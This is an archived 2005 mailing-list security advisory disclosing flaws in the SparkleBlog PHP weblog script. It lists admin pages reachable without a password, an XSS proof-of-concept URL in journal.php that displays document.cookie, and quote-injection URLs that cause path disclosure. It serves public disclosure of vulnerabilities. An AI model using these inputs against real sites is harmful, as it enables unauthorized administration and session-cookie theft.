lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0IAD00JWGA79K1@mail.vnet.hu>
Date: Sat, 15 Jan 2005 17:37:37 +0100
From: Kovács László <bugtracklist@...email.hu>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.netsys.com
Subject: Various Vulnerabilities in SparkleBlog

Various Vulnerabilities in SparkleBlog

 

SparkleBlog is an open-source PHP script which allows you to input and edit
your weblog entries, without having to go through the hassle of coding in
HTML and uploading via FTP every time you want to make an update.  A weblog
(aka blog) is simply an online version of a diary, and blogging has become
very popular in recent years.  The time and date is automatically added to
the end of each of your blog entries, so people know exactly when you posted
them.  The script even allows your website's visitors to make comments on
each of your blog entries, if they wish.

 

No password requied for admin pages. So a remote attacker can request the
file and admin the blog site. 

 

[blogsite]/admin/blogadmin.php

[blogsite]/admin/cpconfig.php

[blogsite]/admin/editentries.php

[blogsite]/admin/update.php

 

XSS attack in journal.php:

 

[blogsite]/journal.php?id=document.write(unescape(%22%3CSCRIPT%3Ealert(docum
ent.domain);%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E%22
));

 

Path disclosure in journal.php: 

 

[blogsite]/blog/journal.php?id='

 

Path disclosure in archives.php: 

 

[blogsite]/blog/archives.php?id='

 

No respone from vendor since: 2005.01.01.

 

SparkleBlog's web page: http://www.creamed-coconut.org/sparkleblog.php 

 

Regards, 

 

Kovács László

kovacs.laszlo@...alogique.hu 

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ